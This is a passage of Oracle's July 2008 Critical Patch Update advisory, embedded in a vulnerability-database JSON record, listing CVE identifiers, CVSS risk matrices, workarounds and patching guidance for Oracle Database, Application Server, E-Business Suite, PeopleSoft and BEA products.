Common Vulnerabilities and Exposures maintains a dictionary of CVE Identifiers for publicly known security vulnerabilities.\r\nWorkarounds\r\n\r\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible. Until you apply the CPU fixes, it may be possible to reduce the risk of successful attack by restricting network protocols required by an attack. For attacks that require certain privileges or access to certain packages, removing the privileges or the ability to access the packages from unprivileged users may help reduce the risk of successful attack. Both approaches may break application functionality, so Oracle strongly recommends that customers test changes on non-production systems. Neither approach should be considered a long-term solution as neither corrects the underlying problem.\r\nUnsupported Products and De-Supported Versions\r\n\r\nUnsupported products, releases and versions are not tested for the presence of vulnerabilities addressed by this Critical Patch Update. However, it is likely that earlier patch sets of affected releases are also affected by these vulnerabilities.\r\n\r\nCritical Patch Update patches are not provided for product versions that are no longer covered under the Premier Support or Extended Support phases of the Lifetime Support Policy. We recommend that customers upgrade to the latest supported version of Oracle products in order to obtain patches.\r\n\r\nExtended Support Phase: Critical Patch Update patches are available to customers who have purchased Extended Support under the Lifetime Support Policy. Customers must have a valid Extended Support service contract to be able to download Critical Patch Update patches for products in the Extended Support Phase. 
Critical Patch Update patches may not be downloaded to update products supported with Sustaining Support, or to update any unsupported products.\r\n\r\nSupported Database, Fusion Middleware and Collaboration Suite products are patched in accordance with the Software Error Correction Support Policy explained in MetaLink Note 209768.1. Please review the Technical Support Policies for further guidelines regarding support policies and phases of support.\r\nOn Request Model for Oracle Database and Oracle Application Server\r\n\r\nOracle will proactively create patches only for platform/version combinations that, based on historical data, customers are likely to download for the next Critical Patch Update. We create patches for historically inactive platform/version combinations of the Oracle Database and Oracle Application Server only if requested by customers. Fixes for the vulnerabilities will continue to be included in future releases and patch sets.\r\n\r\nAdditional details regarding the products, versions and platforms that will be supported for the next Critical Patch Update and the process for requesting On Request patches are available in Section 4.10 (Planned Patches for Next CPU release) of the Critical Patch Update July 2008 Availability Information for Oracle Database and Fusion Middleware Products (MetaLink Note 579278.1).\r\nCredit Statement\r\nThe following people or organizations discovered and brought security vulnerabilities addressed by this Critical Patch Update to Oracle's attention: Flavio Casetta of Yocoya; Esteban Martinez Fayo of Application Security, Inc.; Johannes Greil of SEC Consult; guyp of Sentrigo; Joxean Koret; Alexander Kornbrust of Red Database Security; Stephen Kost of Integrigy; Dave Lewis; David Litchfield of NGS Software; Hirofumi Oka of JPCERT/CC Vulnerability Handling Team; Tanel Poder; Alexandr Polyakov of Digital Security; Andrea Purificato; and Dave Wichers of Aspect Security.\r\n\r\nSecurity-In-Depth 
Contributors\r\n\r\nOracle has instituted a new program to give recognition to people that have contributed to our Security-In-Depth program (see FAQ). People are recognized for Security-In-Depth contributions if they provide information, observations or suggestions pertaining to security vulnerability issues that result in significant modification of Oracle code or documentation in future releases, but are not of such a critical nature that they are distributed in Critical Patch Updates.\r\n\r\nFor this Critical Patch Update, Oracle recognizes Alexander Kornbrust of Red Database Security for contributions to Oracle's Security-In-Depth program.\r\nJanuary 2008 Credit\r\nOracle recognizes Laszlo Toth for reporting a vulnerability that was fixed in the January 2008 Critical Patch Update (Oracle inadvertently neglected to credit Laszlo in the January Critical Patch Update Advisory).\r\nCritical Patch Update Schedule\r\n\r\nCritical Patch Updates are released on the Tuesday closest to the 15th day of January, July, April and October. 
The next four dates are:\r\n\r\n * 14 October 2008\r\n * 13 January 2009\r\n * 14 April 2009\r\n * 14 July 2009\r\n\r\nReferences\r\n\r\n * Oracle Critical Patch Updates and Security Alerts main page [ Oracle Technology Network ]\r\n * Oracle PeopleSoft Security main page [ Customer Connection ]\r\n * Critical Patch Update - July 2008 Documentation Map [ MetaLink Note 605152.1 ]\r\n * Oracle Critical Patch Updates and Security Alerts - Frequently Asked Questions [ CPU FAQ ] \r\n * Risk Matrix definitions [ Risk Matrix Definitions ]\r\n * Use of Common Vulnerability Scoring System (CVSS) by Oracle [ Oracle CVSS Scoring ]\r\n * List of public vulnerabilities fixed in Critical Patch Updates and Security Alerts [ Oracle Technology Network ]\r\n * Software Error Correction Support Policy [MetaLink Note 209768.1 ]\r\n * Security Advisories Notifications for BEA products [BEA Security Advisories ]\r\n\r\nModification History\r\n\r\n2008-JUL-15 \tInitial release\r\n\r\n\r\n\r\nAppendix A - Oracle Database\r\n\r\nOracle Database Executive Summary\r\n\r\nThis Critical Patch Update contains a total of 14 new security fixes for Oracle Database products, divided as follows:\r\n\r\n * 11 new security fixes for the Oracle Database. None of these database vulnerabilities may be remotely exploitable without authentication, i.e. none may be exploited over a network without the need for a username and password. No new security fixes are applicable to Oracle Database client-only installations, i.e. installations that do not have the Oracle Database installed.\r\n * 3 new security fixes for the Times Ten In-Memory Database. All of these vulnerabilities may be remotely exploitable without authentication, i.e. 
they may be exploited over a network without the need for a username and password.\r\n * No new security fixes for the following products:\r\n o Oracle Secure Enterprise Search, which is a separate product that is not installed with the Oracle Database.\r\n o Oracle Application Express (formerly called HTML DB).\r\n o Oracle Audit Vault, which is a separate product that is not installed with the Oracle Database.\r\n o Oracle HTTP Server, which is installed by default with Oracle Database 9i Release 2. For Oracle Database versions 10g and higher, Oracle HTTP Server is on the Companion CD, is separately installable, and is not installed with the Database. Oracle recommends that customers apply this Critical Patch Update to Oracle HTTP Server installations that are affected by vulnerabilities fixed in prior Critical Patch Updates if the prior patches have not been applied. If Oracle HTTP Server has not been installed, this software will not be present and the Oracle HTTP Server patches are not required.\r\n\r\n\r\n\r\nOracle Database Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? 
\tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2008-2607 \tAdvanced Queuing \tOracle Net \tExecute on SYS.DBMS_AQELM \tNo \t6.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tPartial+ \t9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.6 \t \r\nCVE-2008-2613 \tDatabase Scheduler \tLocal \toinstall - OS group \tNo \t6.0 \tLocal \tHigh \tSingle \tComplete \tComplete \tComplete \t10.2.0.4, 11.1.0.6 \t \r\nCVE-2008-2592 \tAdvanced Replication \tOracle Net \tExecute on SYS.DBMS_DEFER_SYS \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tNone \t9.0.1.5+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.6 \tSee Note 1\r\nCVE-2008-2604 \tAuthentication \tOracle Net \tNone \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial \tPartial \tNone \t11.1.0.6 \t \r\nCVE-2008-2591 \tOracle Database Vault \tOracle Net \tCreate Public Synonym \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial \tPartial \tNone \t9.2.0.8DV, 10.2.0.3, 11.1.0.6 \t \r\nCVE-2008-2600 \tOracle Spatial \tOracle Net \tExecute on MDSYS.SDO_TOPO_MAP \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tNone \t10.1.0.5, 10.2.0.3, 11.1.0.6 \t \r\nCVE-2008-2602 \tData Pump \tOracle Net \tCreate Session, IMP_FULL_DATABASE role \tNo \t4.6 \tNetwork \tHigh \tSingle \tPartial+ \tPartial+ \tPartial+ \t10.1.0.5, 10.2.0.4, 11.1.0.6 \t \r\nCVE-2008-2605 \tAuthentication \tOracle Net \tNone \tNo \t4.0 \tNetwork \tLow \tSingle \tPartial+ \tNone \tNone \t11.1.0.6 \t \r\nCVE-2008-2611 \tCore RDBMS \tOracle Net \tCreate Table \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tNone \tPartial+ \t9.0.1.5+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.6 \tSee Note 1\r\nCVE-2008-2608 \tData Pump \tOracle Net \tExecute on SYS.KUPF$FILE_INT \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tNone \tPartial \t10.1.0.5, 10.2.0.3 \t \r\nCVE-2008-2590 (Enterprise 
Manager) \tInstance Management \tHTTP \tValid Session \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \t10.1.0.5 \t \r\nCVE-2008-2603 (Enterprise Manager) \tResource Manager \tHTTP \tValid Session \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \t10.1.0.5, 10.2.0.4, 11.1.0.6 \t \r\nCVE-2008-2587 \tAdvanced Replication \tLocal \tread access to trace files \tNo \t1.5 \tLocal \tMedium \tSingle \tPartial+ \tNone \tNone \t9.0.1.5+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.3 \tSee Note 1\r\n \r\n\r\nNotes:\r\n\r\n 1. 9.0.1.5+ refers to Oracle Database 9i, version 9.0.1.5 FIPS+, which is only used in conjunction with Oracle Application Server 10g (9.0.4), version 9.0.4.3.\r\n\r\n\r\n\r\nOracle Database Client-only Installations\r\n\r\nNo new vulnerabilities affect Oracle Database client-only installations (installations that do not have the Oracle Database installed).\r\n\r\nOracle Secure Enterprise Search\r\n\r\nOracle Secure Enterprise Search 10g is a standalone product that enables searching across a corporation's enterprise information assets. Unless you installed the Oracle Secure Enterprise Search product, it will not be present on your system and no further action is required.\r\n\r\nThe security vulnerabilities listed in the previous Critical Patch Advisories are fixed in Oracle Secure Enterprise Search 10g, version 10.1.8.3. Customers on previous versions of Secure Enterprise Search should upgrade to version 10.1.8.3 or later. Instructions on upgrading Oracle Secure Enterprise Search can be found in the Online Documentation. 
This, and the software to install, is referenced from the Oracle Technology Network Secure Enterprise Search page.\r\n\r\nOracle Secure Enterprise Search 10g includes Oracle Database 10g version 10.1.0.5, and since vulnerabilities affecting this Database version may affect Oracle Secure Enterprise Search, Oracle recommends that customers apply the July 2008 Critical Patch Update to the embedded Database.\r\n\r\nOracle Audit Vault\r\n\r\nOracle Audit Vault 10g is a standalone product that collects and analyzes audit data from multiple systems. Unless you installed the Oracle Audit Vault product, it will not be present on your system and no further action is required.\r\n\r\nOracle Audit Vault has no security vulnerabilities listed in this Critical Patch Update advisory. It is recommended that customers on previous versions of Audit Vault upgrade to version 10.2.3.0 or later. Information about Oracle Audit Vault can be found in the Online Documentation. This, and the Audit Vault software to install, is referenced from the Oracle Technology Network Audit Vault page.\r\n\r\nOracle Audit Vault 10g includes Oracle Database 10g version 10.2.0.3, and vulnerabilities affecting this Database version may affect Oracle Audit Vault. Oracle recommends that all Oracle Audit Vault customers review the Critical Patch Update July 2008 Availability Information for Oracle Database and Fusion Middleware Products, MetaLink Note 579278.1 before applying the July 2008 Critical Patch Update to the embedded Database.\r\n\r\nOverview of Oracle Application Express\r\n\r\nOracle Application Express is a rapid web application development tool for the Oracle Database. 
Unless you separately installed Oracle Application Express from a Companion CD supplied with the Oracle Database CD set or from a package downloaded from an Oracle web site, it will not be present on your system and no further action is required.\r\n\r\nTo check for the presence of Application Express on a system, run the following command from a SQL prompt as SYS:\r\nselect username from dba_users where username in ('FLOWS_010500','FLOWS_010600','FLOWS_020000','FLOWS_020200','FLOWS_030000', 'FLOWS_030100');\r\n\r\nIf the result is 'no rows selected' then no version of the product is installed and no further action is required. Other output indicates Oracle Application Express is installed, even if it is not actively in use.\r\n\r\nUpgrading Oracle Application Express\r\n\r\nThere are no Oracle Application Express security vulnerabilities listed in the risk matrix above. Previously announced security vulnerabilities in Oracle Application Express are fixed in version 3.1 or later. Instructions on upgrading and the software to install the latest version of Oracle Application Express can be found on:\r\nhttp://www.oracle.com/technology/products/database/application_express/download.html.\r\n\r\n\r\n\r\nTimes Ten In-Memory Database Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? 
\tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2008-2597 \tTimesTen Client/Server \tHTTP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tNone \tPartial+ \t7.0.3.0.0 \tSee Note 1\r\nCVE-2008-2598 \tTimesTen Client/Server \tHTTP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tNone \tPartial+ \t7.0.3.0.0 \tSee Note 1\r\nCVE-2008-2599 \tTimesTen Client/Server \tHTTP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tNone \tPartial+ \t7.0.3.0.0 \tSee Note 1\r\n \r\n\r\nNotes:\r\n\r\n 1. The fix is included in version 7.0.4.0.0 of Times Ten Server. Customers on previous versions of Times Ten Server should upgrade to version 7.0.4.0.0 or later.\r\n\r\n\r\nOverview of Times Ten In-Memory Database\r\n\r\nTimes Ten In-memory Database is a memory resident relational Database that targets real-time applications requiring instant response times. It is deployed in the application tier as an embedded database. If you have not installed Times Ten In-memory Database, then no further action is required.\r\n\r\nUpgrading Times Ten In-Memory Database\r\n\r\nThe Times Ten In-Memory Database security vulnerabilities are fixed in version 7.0.4.0.0. All previous versions should be upgraded to version 7.0.4.0.0 or later. Instructions on upgrading and the software to install the latest version of Times Ten In-Memory Database can be found on:\r\nhttp://download.oracle.com/otn_hosted_doc/timesten/703/TimesTen-Documentation/install.pdf.\r\n\r\n\r\n\r\nAppendix B - Oracle Application Server\r\n\r\nOracle Application Server Executive Summary\r\n\r\nThis Critical Patch Update contains 9 new security fixes for Oracle Application Server Suite. All of these vulnerabilities may be remotely exploitable without authentication, i.e. they may be exploited over a network without the need for a username and password. 
None of these security fixes is applicable to client-only installations, i.e. installations that do not have Oracle Application Server installed.\r\n\r\nOracle Application Server products that are bundled with the Oracle Database are affected by the vulnerabilities listed in the Oracle Database section. They are not discussed further in this section and are not listed in the Oracle Application Server risk matrix.\r\n\r\n\r\nOracle Application Server Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2007-1359 \tOracle HTTP Server \tHTTP \tNone \tYes \t6.8 \tNetwork \tMedium \tNone \tPartial \tPartial \tPartial \t10.1.2.3, 10.1.3.3 \t \r\nCVE-2008-2589 \tOracle Portal \tHTTP \tNone \tYes \t6.4 \tNetwork \tLow \tNone \tPartial+ \tPartial+ \tNone \t9.0.4.3, 10.1.2.2, 10.1.4.1 \t \r\nCVE-2008-2594 \tOracle Portal \tHTTP \tNone \tYes \t6.4 \tNetwork \tLow \tNone \tPartial+ \tPartial+ \tNone \t10.1.2.3, 10.1.4.2 \t \r\nCVE-2008-2609 \tOracle Portal \tHTTP \tNone \tYes \t6.4 \tNetwork \tLow \tNone \tPartial+ \tPartial+ \tNone \t9.0.4.3, 10.1.2.3, 10.1.4.2 \t \r\nCVE-2008-2595 \tOracle Internet Directory \tLDAP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tNone \tPartial+ \t9.0.4.3, 10.1.2.3, 10.1.4.2 \t \r\nCVE-2008-2612 \tHyperion BI Plus \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t8.3.2.4, 8.5.0.3, 9.2.0.3, 9.2.1.0, 9.3.1.0 \tSee Note 1\r\nCVE-2008-2614 \tOracle HTTP Server \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t9.0.4.3, 10.1.2.3, 10.1.3.3 \t \r\nCVE-2008-2583 \tOracle Portal \tHTTP \tOracleAS Discussion Forum Portlet \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \tNone - See Note Below 
\tSee Note 2\r\nCVE-2008-2593 \tOracle Portal \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t10.1.2.3, 10.1.4.2 \t \r\n \r\n\r\nNotes:\r\n\r\n 1. This vulnerability also affects earlier versions of this product, namely Hyperion Performance Suite (versions 8.3.2.4 and 8.5.0.3). Note that separate patches are available for each of these product versions.\r\n 2. Discussion Forum Portlet is a sample Portlet which was available for download from OTN and has this vulnerability. Discussion Forum Portlet is no longer available for download and customers who have not downloaded it do not have this vulnerability. Customers who have downloaded Discussion Forum Portlet in the past should manually delete it in order to eliminate this vulnerability.\r\n\r\n\r\nOracle Application Server Client-only Installations\r\n\r\nNone of the above vulnerabilities affects Oracle Application Server client-only installations.\r\n\r\n\r\n\r\nAppendix C - Oracle Collaboration Suite\r\n\r\nOracle Collaboration Suite Executive Summary\r\n\r\nThere are no new Oracle Collaboration Suite specific fixes in this Critical Patch Update.\r\n\r\nThis Critical Patch Update contains no new fixes to Oracle Application Server vulnerabilities that are in code included in Oracle Collaboration Suite. Oracle Collaboration Suite bundles the Oracle Database. All the security fixes listed in the Oracle Database part of the Oracle Database section are applicable. The Oracle Collaboration Suite documentation referenced from this advisory lists the patches that should be installed on Oracle Collaboration Suite instances to fix these Oracle Database issues.\r\n\r\n\r\n\r\nAppendix D - Oracle E-Business Suite and Applications\r\n\r\nOracle E-Business Suite and Applications Executive Summary\r\n\r\nThis Critical Patch Update contains 6 new security fixes for the Applications Suite. None of these vulnerabilities may be remotely exploitable without authentication, i.e. 
none may be exploited over a network without the need for a username and password. None of these fixes are applicable to Oracle E-Business Suite client-only installations.\r\n\r\nOracle E-Business Suite 11i includes Oracle9i Application Server, version 1.0.2.2 code, including Oracle Reports Developer. None of the Oracle Application Server vulnerabilities fixed in this Critical Patch Update affect this version.\r\n\r\nOracle E-Business Suite products include an Oracle Database which is affected by the vulnerabilities listed in the Oracle Database section. The exposure of Oracle E-Business Suite products is dependent on the Oracle Database version being used. Oracle Database vulnerabilities are not listed in the Oracle E-Business Suite risk matrix, but since vulnerabilities affecting this Database version may affect Oracle E-Business Suite products, Oracle recommends that customers apply the July 2008 Critical Patch Update to the embedded Database.\r\n\r\nThere are no new security fixes specific to Oracle Life Sciences Applications (previously known as Oracle Pharmaceutical Applications). However, Oracle Life Sciences Applications includes Oracle Application Server components and Oracle Database software. The exposure of Oracle Life Sciences Applications depends on the versions of Oracle Application Server and the Oracle Database being used. Oracle recommends that customers apply the July 2008 Critical Patch Update to the Oracle Database and Oracle Application Server that are included in Oracle Life Sciences Applications. Please refer to the Oracle Application Server and Oracle Database sections for more information. Oracle Life Sciences Applications customers should refer to MetaLink Note 605119.1 for detailed information on applying the Critical Patch Update to the Oracle Database and Application Server components.\r\n\r\n\r\nOracle E-Business Suite Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? 
\tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2008-2596 \tMobile Application Server \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial \tNone \t12.0.3 \t \r\nCVE-2008-2585 \tOracle Report Manager \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tNone \tPartial \tPartial \t12.0.4 \t \r\nCVE-2008-2601 \tOracle iStore \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial \tPartial \tNone \t12.0.4 \t \r\nCVE-2008-2586 \tOracle Application Object Library \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tPartial \tNone \tNone \t12.0.4 \t \r\nCVE-2008-2606 \tOracle Application Object Library \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tPartial \tNone \t12.0.4 \t \r\nCVE-2008-2610 \tOracle Applications Technology Stack \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tPartial \tNone \t12.0.4 \t \r\n \r\n\r\n\r\n\r\n\r\n\r\nAppendix E - Oracle Enterprise Manager\r\n\r\nOracle Enterprise Manager Executive Summary\r\n\r\nThis Critical Patch Update contains 2 new security fixes for the Enterprise Manager Suite. Neither of these vulnerabilities may be remotely exploitable without authentication, i.e. neither may be exploited over a network without the need for a username and password. \r\n\r\nOracle Enterprise Manager 10g Grid Control includes Oracle Database and Oracle Application Server components that are affected by the vulnerabilities listed in the Oracle Database and Oracle Application Server sections. The exposure of a particular instance of Oracle Enterprise Manager depends on the Oracle Database and Oracle Application Server versions being used. 
Oracle recommends that customers apply the July 2008 Critical Patch Update to the embedded Oracle Database and Oracle Application Server.\r\n\r\nReleases of Oracle Enterprise Manager before Oracle Enterprise Manager 10g Grid Control include Oracle Database components that are affected by the vulnerabilities listed in the Oracle Database section. The exposure of a particular instance of Oracle Enterprise Manager depends on the Oracle Database version being used. Oracle recommends that customers apply the July 2008 Critical Patch Update to the embedded Oracle Database.\r\n\r\nOracle Enterprise Manager Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2008-2590 \tInstance Management \tHTTP \tValid Session \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \t10.1.0.6 \t \r\nCVE-2008-2603 \tResource Manager \tHTTP \tValid Session \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \tNone - See Note Below \tSee Note 1\r\n \r\n\r\nNotes:\r\n\r\n 1. This vulnerability affects Database Control only. No Grid Control patch is required.\r\n\r\n\r\n\r\n\r\n\r\nAppendix F - Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne\r\n\r\nOracle PeopleSoft Enterprise and JD Edwards EnterpriseOne Executive Summary\r\n\r\nThis Critical Patch Update contains 7 new security fixes for the PeopleSoft-JDEdwards Suite. None of these vulnerabilities may be remotely exploited without authentication, i.e. they may not be exploited over a network without the need for a username and password. None of these fixes are applicable to client-only installations, i.e. 
installations that do not have a server installed.\r\n\r\n\r\nOracle PeopleSoft Enterprise and JD Edwards EnterpriseOne Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2008-2615 \tPeopleSoft PeopleTools \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tNone \t8.48.17, 8.49.11 \t \r\nCVE-2008-2622 \tPeopleSoft PeopleTools \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tNone \t8.48.17, 8.49.11 \t \r\nCVE-2008-2616 \tPeopleSoft PeopleTools \tNetwork \tValid Session \tNo \t4.9 \tNetwork \tMedium \tSingle \tNone \tPartial \tPartial \t8.48.17, 8.49.11 \t \r\nCVE-2008-2617 \tPeopleSoft PeopleTools \tHTTP \tValid Session \tNo \t4.9 \tNetwork \tMedium \tSingle \tPartial \tNone \tPartial \t8.48.17, 8.49.11 \t \r\nCVE-2008-2618 \tPeopleSoft PeopleTools \tHTTP \tValid Session \tNo \t4.9 \tNetwork \tMedium \tSingle \tPartial+ \tPartial+ \tNone \t8.48.17, 8.49.11 \t \r\nCVE-2008-2620 \tPeopleSoft PeopleTools \tNetwork \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tPartial \tNone \t8.48.17, 8.49.11 \t \r\nCVE-2008-2621 \tPeopleSoft PeopleTools \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tPartial \tNone \t8.48.17, 8.49.11 \t \r\n \r\n\r\n\r\n\r\n\r\nAppendix G - Oracle Siebel Enterprise\r\n\r\nOracle Siebel Enterprise Executive Summary\r\n\r\nThis Critical Patch Update contains no new security fixes for the Siebel Suite. \r\n\r\nAppendix H - BEA Product Suite\r\n\r\nBEA Products Executive Summary\r\n\r\nThis Critical Patch Update contains 7 new security fixes for the BEA Product Suite. 4 of these vulnerabilities may be remotely exploitable without authentication, i.e. 
may be exploited over a network without the need for a username and password. \r\n\r\n\r\n\r\nBEA Product Suite Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2008-2579 \tWebLogic Server Plugins for Apache, Sun and IIS web servers \tHTTP \tApache, Sun or IIS \tYes \t6.8 \tNetwork \tMedium \tNone \tPartial \tPartial \tPartial \t10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, 6.1 SP7 \tSee Note 1\r\nCVE-2008-2581 \tWebLogic Server \tHTTP \tUDDI Explorer \tYes \t5.1 \tNetwork \tHigh \tNone \tPartial+ \tPartial+ \tPartial+ \t10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7 \tSee Note 1\r\nCVE-2008-2582 \tWebLogic Server \tHTTP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tNone \tPartial+ \t10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7 \tSee Note 1\r\nCVE-2008-2577 \tWebLogic Server \tHTTP \tConsole or WLST user \tNo \t4.6 \tNetwork \tHigh \tSingle \tPartial \tPartial \tPartial \t9.2 MP1 \tSee Note 1\r\nCVE-2008-2578 \tWebLogic Server \tLocal \tNone \tNo \t4.3 \tLocal \tLow \tSingle \tPartial+ \tPartial+ \tPartial+ \t10.0, 9.2 MP1 \tSee Note 1\r\nCVE-2008-2576 \tWebLogic Server \tLocal \tNone \tNo \t4.1 \tLocal \tMedium \tSingle \tPartial \tPartial \tPartial \t9.2, 9.1, 9.0, 8.1 SP6 \tSee Note 1\r\nCVE-2008-2580 \tWebLogic Server \tHTTP \tNone \tYes \t2.6 \tNetwork \tHigh \tNone \tPartial \tNone \tNone \t10.0 MP1, 9.2 MP3, 9.1, 9.0 \tSee Note 1\r\n \r\n\r\nNotes:\r\n\r\n 1. 
Follow the link for each of the CVE numbers to get download, installation and other information pertaining to the corresponding vulnerability fix: CVE-2008-2576, CVE-2008-2577, CVE-2008-2578, CVE-2008-2579, CVE-2008-2580, CVE-2008-2581, CVE-2008-2582\r\n", "edition": 1, "cvss3": {}, "published": "2008-07-18T00:00:00", "title": "Oracle Critical Patch Update Advisory - July 2008", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2008-2606", "CVE-2008-2579", "CVE-2008-2591", "CVE-2008-2600", "CVE-2008-2612", "CVE-2008-2605", "CVE-2007-1359", "CVE-2008-2603", "CVE-2008-2620", "CVE-2008-2587", "CVE-2008-2583", "CVE-2008-2577", "CVE-2008-2581", "CVE-2008-2582", "CVE-2008-2597", "CVE-2008-2604", "CVE-2008-2589", "CVE-2008-2602", "CVE-2008-2598", "CVE-2008-2576", "CVE-2008-2607", "CVE-2008-2601", "CVE-2008-2617", "CVE-2008-2614", "CVE-2008-2595", "CVE-2008-2578", "CVE-2008-2616", "CVE-2008-2594", "CVE-2008-2608", "CVE-2008-2611", "CVE-2008-2580", "CVE-2008-2590", "CVE-2008-2586", "CVE-2008-2610", "CVE-2008-2613", "CVE-2008-2621", "CVE-2008-2609", "CVE-2008-2622", "CVE-2008-2592", "CVE-2008-2599", "CVE-2008-2593", "CVE-2008-2618", "CVE-2008-2585", "CVE-2008-2596", "CVE-2008-2615"], "modified": "2008-07-18T00:00:00", "id": "SECURITYVULNS:DOC:20166", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20166", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T19:09:20", "description": "New Critical Patch Update patches nearly 50 different vulnerabilities in all Oracle products.", "edition": 2, "cvss3": {}, "published": "2008-08-05T00:00:00", "title": "Oracle multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2008-2606", "CVE-2008-2579", "CVE-2008-2591", "CVE-2008-2600", "CVE-2008-2612", "CVE-2008-2605", "CVE-2007-1359", "CVE-2008-2603", "CVE-2008-2620", "CVE-2008-2587", "CVE-2008-2583", 
